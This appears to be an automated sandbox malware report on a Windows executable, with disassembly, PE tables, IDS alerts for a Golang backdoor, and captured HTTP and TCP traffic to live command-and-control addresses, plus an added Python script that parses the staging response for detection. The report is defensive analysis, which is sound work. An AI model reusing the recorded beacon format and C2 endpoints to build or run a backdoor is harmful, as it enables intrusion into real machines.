                                    mov dword ptr [00C50464h], ebx
                                    mov dword ptr [00C50460h], esi
                                    mov dword ptr [00C5045Ch], edi
                                    mov word ptr [00C50488h], ss
                                    mov word ptr [00C5047Ch], cs
                                    mov word ptr [00C50458h], ds
                                    mov word ptr [00C50454h], es
                                    mov word ptr [00C50450h], fs
                                    mov word ptr [00C5044Ch], gs
                                    pushfd
                                    pop dword ptr [00C50480h]
                                    mov eax, dword ptr [ebp+00h]
                                    mov dword ptr [00C50474h], eax
                                    mov eax, dword ptr [ebp+04h]
                                    mov dword ptr [00C50478h], eax
                                    lea eax, dword ptr [ebp+08h]
                                    mov dword ptr [00C50484h], eax
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | 
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x76b54 | 0x3c | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x853000 | 0x130d9 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | 
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | 
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x867000 | 0x5de8 | .reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x75b1c | 0x54 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | 
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | 
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | 
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x75b70 | 0x40 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | 
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x68000 | 0x138 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | 
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | 
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | 
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x6662a | 0x66800 | 801052a5a72c2c554a19146608d98944 | False | 0.4894435975609756 | data | 6.378532137689188 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x68000 | 0xf24c | 0xf400 | 81f0dca41b069d779bfb91c610fd9ed9 | False | 0.3240266393442623 | data | 4.5864135163773065 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data | 0x78000 | 0x7d94b8 | 0x7d8400 | d9ec9b9f5bd045ed0371fec913cc8e08 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .fptable | 0x852000 | 0x80 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc | 0x853000 | 0x130d9 | 0x13200 | 98c3859ea3f901469b91c116e046a172 | False | 0.07089971405228758 | data | 4.40099057587106 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc | 0x867000 | 0x5de8 | 0x5e00 | 031856b7d0a5dc059a1fc3ee1fecb555 | False | 0.801030585106383 | data | 6.815190496020655 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    RT_ICON | 0x8534f0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | | | 0.011741393588075239
                                    RT_MENU | 0x863d18 | 0x22 | data | | | 1.1176470588235294
                                    RT_MENU | 0x863d3c | 0x26 | data | | | 1.105263157894737
                                    RT_DIALOG | 0x863d64 | 0x24c | data | | | 0.5952380952380952
                                    RT_DIALOG | 0x863fb0 | 0x31c | data | | | 0.5414572864321608
                                    RT_DIALOG | 0x8642cc | 0x2d4 | data | | | 0.5386740331491713
                                    RT_DIALOG | 0x8645a0 | 0x234 | data | | | 0.5886524822695035
                                    RT_DIALOG | 0x8647d4 | 0x24c | data | | | 0.5867346938775511
                                    RT_DIALOG | 0x864a20 | 0x194 | data | | | 0.6188118811881188
                                    RT_DIALOG | 0x864bb4 | 0x328 | data | | | 0.5160891089108911
                                    RT_DIALOG | 0x864edc | 0x110 | data | | | 0.6801470588235294
                                    RT_STRING | 0x864fec | 0xb0 | data | | | 0.7045454545454546
                                    RT_STRING | 0x86509c | 0x188 | data | | | 0.6275510204081632
                                    RT_STRING | 0x865224 | 0x17c | data | | | 0.6210526315789474
                                    RT_STRING | 0x8653a0 | 0x1a8 | data | | | 0.6084905660377359
                                    RT_STRING | 0x865548 | 0x19c | data | | | 0.6043689320388349
                                    RT_STRING | 0x8656e4 | 0xc8 | data | | | 0.675
                                    RT_MESSAGETABLE | 0x8657ac | 0x2f4 | Matlab v4 mat-file (little endian) Y, rows 73, columns 73, imaginary | | | 0.5211640211640212
                                    RT_MESSAGETABLE | 0x865aa0 | 0x3cc | Matlab v4 mat-file (little endian) Y\001, rows 326, columns 329, imaginary | | | 0.5257201646090535
                                    RT_GROUP_ICON | 0x865e6c | 0x14 | data | | | 1.15
                                    RT_VERSION | 0x865e80 | 0xdc | data | | | 0.6681818181818182
                                    RT_MANIFEST | 0x865f5c | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
                                    DLL | Import
                                    KERNEL32.dll | VirtualProtect, WriteFile, CreateFileW, DecodePointer, GetConsoleMode, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, GetStdHandle, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, InitializeCriticalSectionEx, LCMapStringW, GetProcessHeap, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, WriteConsoleW, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, CloseHandle
                                    USER32.dll | MessageBoxA, MessageBoxW
                                    Language of compilation system | Country where language is spoken
                                    English | United States
                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                    2025-01-01T17:02:44.862102+0100 | 2855539 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 | 1 | 185.157.213.253 | 22132 | 192.168.2.5 | 59227 | TCP
                                    2025-01-01T17:02:44.876620+0100 | 2855536 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 | 1 | 192.168.2.5 | 59227 | 185.157.213.253 | 22132 | TCP
                                    2025-01-01T17:03:14.288230+0100 | 2855537 | ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 | 1 | 192.168.2.5 | 59227 | 185.157.213.253 | 22132 | TCP
                                    2025-01-01T17:03:14.460470+0100 | 2855538 | ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 | 1 | 185.157.213.253 | 22132 | 192.168.2.5 | 59227 | TCP
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Jan 1, 2025 17:01:44.141230106 CET | 59036 | 53 | 192.168.2.5 | 162.159.36.2
                                    Jan 1, 2025 17:01:44.146087885 CET | 53 | 59036 | 162.159.36.2 | 192.168.2.5
                                    Jan 1, 2025 17:01:44.146225929 CET | 59036 | 53 | 192.168.2.5 | 162.159.36.2
                                    Jan 1, 2025 17:01:44.151417971 CET | 53 | 59036 | 162.159.36.2 | 192.168.2.5
                                    Jan 1, 2025 17:01:44.591259003 CET | 59036 | 53 | 192.168.2.5 | 162.159.36.2
                                    Jan 1, 2025 17:01:44.596268892 CET | 53 | 59036 | 162.159.36.2 | 192.168.2.5
                                    Jan 1, 2025 17:01:44.596333981 CET | 59036 | 53 | 192.168.2.5 | 162.159.36.2
                                    Jan 1, 2025 17:02:43.384221077 CET | 59226 | 80 | 192.168.2.5 | 46.8.232.106
                                    Jan 1, 2025 17:02:43.389094114 CET | 80 | 59226 | 46.8.232.106 | 192.168.2.5
                                    Jan 1, 2025 17:02:43.389184952 CET | 59226 | 80 | 192.168.2.5 | 46.8.232.106
                                    Jan 1, 2025 17:02:43.389489889 CET | 59226 | 80 | 192.168.2.5 | 46.8.232.106
                                    Jan 1, 2025 17:02:43.394284010 CET | 80 | 59226 | 46.8.232.106 | 192.168.2.5
                                    Jan 1, 2025 17:02:44.278578997 CET | 80 | 59226 | 46.8.232.106 | 192.168.2.5
                                    Jan 1, 2025 17:02:44.282610893 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:02:44.287389994 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:02:44.287462950 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:02:44.320118904 CET | 59226 | 80 | 192.168.2.5 | 46.8.232.106
                                    Jan 1, 2025 17:02:44.862102032 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:02:44.876620054 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:02:44.881436110 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:03:00.052450895 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:03:00.057351112 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:03:04.806451082 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:03:04.864960909 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:03:04.983659029 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:03:04.988507032 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:03:14.288229942 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:03:14.293134928 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:03:14.366863012 CET | 59226 | 80 | 192.168.2.5 | 46.8.232.106
                                    Jan 1, 2025 17:03:14.371727943 CET | 80 | 59226 | 46.8.232.106 | 192.168.2.5
                                    Jan 1, 2025 17:03:14.460469961 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:03:14.555089951 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:03:25.156049967 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:03:25.181206942 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:03:25.186094046 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:03:40.353435993 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:03:40.358309031 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:03:44.462758064 CET | 59226 | 80 | 192.168.2.5 | 46.8.232.106
                                    Jan 1, 2025 17:03:44.525584936 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:03:44.650660992 CET | 80 | 59226 | 46.8.232.106 | 192.168.2.5
                                    Jan 1, 2025 17:03:44.650672913 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:03:44.817909002 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:03:44.964365959 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:03:45.353786945 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:03:45.371764898 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:03:45.376518965 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:04:00.463525057 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:04:00.468405008 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:04:05.577845097 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:04:05.623042107 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:04:05.627876997 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:04:14.318263054 CET | 59226 | 80 | 192.168.2.5 | 46.8.232.106
                                    Jan 1, 2025 17:04:14.323333025 CET | 80 | 59226 | 46.8.232.106 | 192.168.2.5
                                    Jan 1, 2025 17:04:14.323400021 CET | 59226 | 80 | 192.168.2.5 | 46.8.232.106
                                    Jan 1, 2025 17:04:14.834716082 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:04:14.839677095 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:04:15.007049084 CET | 22132 | 59227 | 185.157.213.253 | 192.168.2.5
                                    Jan 1, 2025 17:04:15.055140018 CET | 59227 | 22132 | 192.168.2.5 | 185.157.213.253
                                    Jan 1, 2025 17:04:18.079575062 CET | 59228 | 80 | 192.168.2.5 | 46.8.232.106
                                    Jan 1, 2025 17:04:18.084449053 CET | 80 | 59228 | 46.8.232.106 | 192.168.2.5
                                    Jan 1, 2025 17:04:18.085901022 CET | 59228 | 80 | 192.168.2.5 | 46.8.232.106
                                    Jan 1, 2025 17:04:18.093914032 CET | 59228 | 80 | 192.168.2.5 | 46.8.232.106
                                    Jan 1, 2025 17:04:18.098762035 CET | 80 | 59228 | 46.8.232.106 | 192.168.2.5
                                    Jan 1, 2025 17:04:18.129911900 CET | 59229 | 80 | 192.168.2.5 | 46.8.232.106
                                    Jan 1, 2025 17:04:18.134711981 CET | 80 | 59229 | 46.8.232.106 | 192.168.2.5
                                    Jan 1, 2025 17:04:18.134860039 CET | 59229 | 80 | 192.168.2.5 | 46.8.232.106
                                    Jan 1, 2025 17:04:18.135109901 CET | 59229 | 80 | 192.168.2.5 | 46.8.232.106
                                    Jan 1, 2025 17:04:18.139862061 CET | 80 | 59229 | 46.8.232.106 | 192.168.2.5
                                    Jan 1, 2025 17:04:19.008264065 CET | 80 | 59229 | 46.8.232.106 | 192.168.2.5
                                    Jan 1, 2025 17:04:19.166759014 CET | 59229 | 80 | 192.168.2.5 | 46.8.232.106
                                    Jan 1, 2025 17:04:19.281573057 CET | 80 | 59228 | 46.8.232.106 | 192.168.2.5
                                    Jan 1, 2025 17:04:19.479193926 CET | 59228 | 80 | 192.168.2.5 | 46.8.232.106
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Jan 1, 2025 17:01:44.140511036 CET | 53 | 63175 | 162.159.36.2 | 192.168.2.5
                                    Jan 1, 2025 17:01:44.595432043 CET | 54737 | 53 | 192.168.2.5 | 1.1.1.1
                                    Jan 1, 2025 17:01:44.602360964 CET | 53 | 54737 | 1.1.1.1 | 192.168.2.5
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Jan 1, 2025 17:01:44.595432043 CET | 192.168.2.5 | 1.1.1.1 | 0x6411 | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Jan 1, 2025 17:01:44.602360964 CET | 1.1.1.1 | 192.168.2.5 | 0x6411 | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                                    • 46.8.232.106
                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.5 | 59226 | 46.8.232.106 | 80 | 7328 | C:\Users\user\Desktop\lDO4WBEQyL.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jan 1, 2025 17:02:43.389489889 CET | 314 | OUT | POST / HTTP/1.1
                                    Host: 46.8.232.106
                                    User-Agent: Go-http-client/1.1
                                    Content-Length: 178
                                    X-Api-Key: z9AJoadU
                                    Accept-Encoding: gzip
                                    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 34 05 0d 16 07 23 11 16 02 2f 30 08 0e 22 29 2a 0a 0a 01 10 06 14 54 58 09 54 36 00 07 38 56 52 0b 59 50 24 0e 04 20 1c 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2c 2f 01 09 1b 3e 07 2d 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 0a 1f 16 5e 26 07 23 25 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 26 36 39 41 2d 5e 3a 54 29 04 09 44 45 45 0e 0b 5b 44 53 45 57 5c 5f 52 5b 52 56 5d 0b 52 51 56 51 0a 5d 55 5a 50 51 5d 58 05 08 56 55 59 5a 03 0d 50 51 57 4c 1b
                                    Data Ascii: M*L\K4#/0")*TXT68VRYP$ DEE2MTD,/>-ACL>K]A^&#%DEE1AULV&69A-^:T)DEE[DSEW\_R[RV]RQVQ]UZPQ]XVUYZPQWL
                                    Jan 1, 2025 17:02:44.278578997 CET | 632 | IN | HTTP/1.1 200 OK
                                    Date: Wed, 01 Jan 2025 16:02:44 GMT
                                    Content-Length: 514
                                    Content-Type: text/plain; charset=utf-8
                                    Data Raw: 31 38 35 2e 31 35 37 2e 32 31 33 2e 32 35 33 3b 32 32 31 33 32 3b 68 64 50 6f 74 72 59 4d 74 4e 4c 73 70 44 4c 32 3a 34 4a 49 2f 67 67 41 2f 78 63 6d 34 66 71 52 36 69 6a 71 2e 39 6a 75 38 4c 48 43 2e 6a 6d 51 32 41 58 72 33 36 48 6a 32 71 30 32 2e 56 36 34 31 54 55 38 30 50 54 30 36 46 57 46 2c 39 33 72 68 74 46 62 74 4c 47 7a 74 34 70 4a 70 68 55 65 3a 52 79 39 2f 57 79 76 2f 6d 57 30 34 31 46 4f 36 36 41 52 2e 77 59 51 38 79 39 39 2e 79 41 49 32 68 4e 51 33 67 61 4c 36 73 39 41 2e 74 52 53 36 30 76 53 31 6c 77 63 2c 50 71 73 68 48 38 56 74 49 5a 34 74 72 4b 52 70 54 66 52 3a 63 51 38 2f 63 41 4a 2f 69 53 73 39 64 6b 33 31 55 48 48 2e 69 6d 56 32 77 53 6a 31 4f 46 4d 32 32 7a 48 2e 52 30 57 31 55 5a 72 36 79 4d 48 36 36 61 75 2e 58 5a 6c 39 6a 42 78 31 36 79 57 2c 59 6b 42 68 35 45 4d 74 78 33 35 74 59 37 78 70 5a 51 36 3a 70 47 70 2f 59 53 6a 2f 32 47 4c 33 62 58 47 38 57 51 4c 2e 33 52 73 31 71 58 41 38 52 42 46 30 5a 31 48 2e 31 75 4a 32 54 61 7a 30 6b 30 71 35 42 44 76 2e 78 77 61 31 59 79 34 [TRUNCATED]
                                    Data Ascii: 185.157.213.253;22132;hdPotrYMtNLspDL2:4JI/ggA/xcm4fqR6ijq.9ju8LHC.jmQ2AXr36Hj2q02.V641TU80PT06FWF,93rhtFbtLGzt4pJphUe:Ry9/Wyv/mW041FO66AR.wYQ8y99.yAI2hNQ3gaL6s9A.tRS60vS1lwc,PqshH8VtIZ4trKRpTfR:cQ8/cAJ/iSs9dk31UHH.imV2wSj1OFM22zH.R0W1UZr6yMH66au.XZl9jBx16yW,YkBh5EMtx35tY7xpZQ6:pGp/YSj/2GL3bXG8WQL.3Rs1qXA8RBF0Z1H.1uJ2Taz0k0q5BDv.xwa1Yy46M7M4Xj7,iV0hyZstdzAtbDQpNMe:psb/ZND/w389qit1EUG.vxv2sy315wI2o7S.ik41fIY6Ylx6ATP.Wl09cpV,fDths4UtNjIt1hkpnHo:T4W/vH5/4Fx1ukA4CI77CfF.onm44ju59WG.QYa1SpC9xxA6Rss.fP41py65BkQ7SqX
                                    Jan 1, 2025 17:03:14.366863012 CET | 6 | OUT | Data Raw: 00
                                    Data Ascii:
                                    Jan 1, 2025 17:03:44.462758064 CET | 6 | OUT | Data Raw: 00
                                    Data Ascii:


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                    1 | 192.168.2.5 | 59228 | 46.8.232.106 | 80
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jan 1, 2025 17:04:18.093914032 CET | 314 | OUT | POST / HTTP/1.1
                                    Host: 46.8.232.106
                                    User-Agent: Go-http-client/1.1
                                    Content-Length: 178
                                    X-Api-Key: ut5yhs9h
                                    Accept-Encoding: gzip
                                    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 34 05 0d 16 07 23 11 16 02 2f 30 08 0e 22 29 2a 0a 0a 01 10 06 14 54 58 09 54 36 00 07 38 56 52 0b 59 50 24 0e 04 20 1c 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2c 2f 01 09 1b 3e 07 2d 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 0a 1f 16 5e 26 07 23 25 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 26 36 39 41 2d 5e 3a 54 29 04 09 44 45 45 0e 0b 5b 44 53 45 57 5c 5f 52 5b 52 56 5d 0b 52 51 56 51 0a 5d 55 5a 50 51 5d 58 05 08 56 55 59 5a 03 0d 50 51 57 4c 1b
                                    Data Ascii: M*L\K4#/0")*TXT68VRYP$ DEE2MTD,/>-ACL>K]A^&#%DEE1AULV&69A-^:T)DEE[DSEW\_R[RV]RQVQ]UZPQ]XVUYZPQWL
                                    Jan 1, 2025 17:04:19.281573057 CET | 165 | IN | HTTP/1.1 429 Too Many Requests
                                    Content-Type: text/plain; charset=utf-8
                                    X-Content-Type-Options: nosniff
                                    Date: Wed, 01 Jan 2025 16:04:19 GMT
                                    Content-Length: 1
                                    Data Raw: 0a
                                    Data Ascii:


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                    2 | 192.168.2.5 | 59229 | 46.8.232.106 | 80
                                    Timestamp | Bytes transferred | Direction | Data
                                    Jan 1, 2025 17:04:18.135109901 CET | 314 | OUT | POST / HTTP/1.1
                                    Host: 46.8.232.106
                                    User-Agent: Go-http-client/1.1
                                    Content-Length: 178
                                    X-Api-Key: pH40oZCj
                                    Accept-Encoding: gzip
                                    Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 34 05 0d 16 07 23 11 16 02 2f 30 08 0e 22 29 2a 0a 0a 01 10 06 14 54 58 09 54 36 00 07 38 56 52 0b 59 50 24 0e 04 20 1c 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2c 2f 01 09 1b 3e 07 2d 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 0a 1f 16 5e 26 07 23 25 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 26 36 39 41 2d 5e 3a 54 29 04 09 44 45 45 0e 0b 5b 44 53 45 57 5c 5f 52 5b 52 56 5d 0b 52 51 56 51 0a 5d 55 5a 50 51 5d 58 05 08 56 55 59 5a 03 0d 50 51 57 4c 1b
                                    Data Ascii: M*L\K4#/0")*TXT68VRYP$ DEE2MTD,/>-ACL>K]A^&#%DEE1AULV&69A-^:T)DEE[DSEW\_R[RV]RQVQ]UZPQ]XVUYZPQWL
                                    Jan 1, 2025 17:04:19.008264065 CET | 165 | IN | HTTP/1.1 429 Too Many Requests
                                    Content-Type: text/plain; charset=utf-8
                                    X-Content-Type-Options: nosniff
                                    Date: Wed, 01 Jan 2025 16:04:18 GMT
                                    Content-Length: 1
                                    Data Raw: 0a
                                    Data Ascii:
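The three HTTP sessions above show the staging step of this sample: a POST to a bare-IP host with the Go default User-Agent, an 8-character X-Api-Key that changes per request, and a 178-byte body that is byte-for-byte identical in all three requests. Session 0 is answered with a text/plain body of the form ip;port;blob naming 185.157.213.253:22132, and the TCP packet list shows the first packet to that endpoint about four milliseconds after the 200 OK arrived; sessions 1 and 2 are refused with 429 Too Many Requests. The Python below is an added example written for this page, not code from the Joe Sandbox report or from the sample. It parses the response shape as observed here (the blob is treated as opaque, since the report does not say what it encodes), scores a request against the header traits visible above, classifies the two response types, and correlates the staged endpoint against rows of the TCP table. The request headers, response prefix and packet rows are constructed from the report's own tables; nothing contacts the network.

```python
"""Added example (not from the report or the sample): parse the HTTP staging
response, score the beacon request, and correlate with the packet list."""
import ipaddress
import re
from datetime import datetime
from typing import NamedTuple, Optional

# --- Constructed from the report's tables; nothing here is captured live ---

# Headers of the POST in HTTP session 0.
REQUEST_HEADERS = {
    "Host": "46.8.232.106",
    "User-Agent": "Go-http-client/1.1",
    "Content-Length": "178",
    "X-Api-Key": "z9AJoadU",
    "Accept-Encoding": "gzip",
}
REQUEST_BODY_LEN = 178

# Leading part of the 514-byte text/plain body returned with "200 OK".
STAGING_BODY = ("185.157.213.253;22132;hdPotrYMtNLspDL2:4JI/ggA/xcm4fqR6ijq."
                "9ju8LHC.jmQ2AXr36Hj2q02.V641TU80PT06FWF,93rhtFbtLGzt4pJphUe")

# Four rows of the TCP packet table: (timestamp, src_port, dst_port, src, dst).
PACKET_ROWS = [
    ("2025-01-01 17:02:43.389489", 59226, 80, "192.168.2.5", "46.8.232.106"),
    ("2025-01-01 17:02:44.278578", 80, 59226, "46.8.232.106", "192.168.2.5"),
    ("2025-01-01 17:02:44.282610", 59227, 22132, "192.168.2.5", "185.157.213.253"),
    ("2025-01-01 17:02:44.287389", 22132, 59227, "185.157.213.253", "192.168.2.5"),
]


class Stage(NamedTuple):
    ip: str
    port: int
    blob: str  # opaque here; the report does not say what it encodes


def parse_staging_body(body: str) -> Optional[Stage]:
    """Parse the observed 'ip;port;blob' shape; None if the body does not fit."""
    parts = body.strip().split(";", 2)
    if len(parts) != 3:
        return None
    ip, port_s, blob = parts
    try:
        ipaddress.IPv4Address(ip)
        port = int(port_s)
    except ValueError:
        return None
    if not 0 < port < 65536 or not blob:
        return None
    return Stage(ip, port, blob)


API_KEY_RE = re.compile(r"^[A-Za-z0-9]{8}$")


def beacon_indicators(headers: dict, body_len: int) -> list:
    """Traits of the beacon that are visible in the captured request headers."""
    hits = []
    if headers.get("User-Agent", "").startswith("Go-http-client/"):
        hits.append("Go default User-Agent")
    try:
        ipaddress.IPv4Address(headers.get("Host", "").split(":")[0])
        hits.append("Host header is a bare IPv4 address")
    except ValueError:
        pass
    if API_KEY_RE.match(headers.get("X-Api-Key", "")):
        hits.append("8-character alphanumeric X-Api-Key")
    if body_len == 178:
        hits.append("178-byte body (identical across all three sessions)")
    return hits


def classify_response(status: int, body: str) -> str:
    """'stage' for a 200 carrying ip;port;blob, 'rate-limited' for the 429s."""
    if status == 200 and parse_staging_body(body) is not None:
        return "stage"
    if status == 429:
        return "rate-limited"
    return "other"


def first_connection_to(rows, stage: Stage, not_before: str):
    """First packet towards stage.ip:stage.port at or after not_before."""
    t0 = datetime.fromisoformat(not_before)
    for ts, sport, dport, src, dst in rows:
        if dst == stage.ip and dport == stage.port and datetime.fromisoformat(ts) >= t0:
            return ts, sport
    return None


if __name__ == "__main__":
    stage = parse_staging_body(STAGING_BODY)
    print("beacon traits:", beacon_indicators(REQUEST_HEADERS, REQUEST_BODY_LEN))
    print("staged C2:", stage.ip, stage.port)
    # The 200 OK arrived at 17:02:44.278; the first packet to 22132 follows ~4 ms later.
    print("follow-on:", first_connection_to(PACKET_ROWS, stage, "2025-01-01 17:02:44.278578"))
```

Run against a real capture, the same logic would take the HTTP transaction from a proxy or Zeek http.log and the connection rows from conn.log; the point of the correlation step is that the ip;port pair handed out over HTTP, not the HTTP host itself, is the indicator worth blocking and hunting for, because the stager answered only once and rate-limited the retries.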


                                    Target ID:0
                                    Start time:11:01:10
                                    Start date:01/01/2025
                                    Path:C:\Users\user\Desktop\lDO4WBEQyL.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\lDO4WBEQyL.exe"
                                    Imagebase:0xf80000
                                    File size:8'812'032 bytes
                                    MD5 hash:43142552E4812E3337226CA1664ED728
                                    Has elevated privileges:true
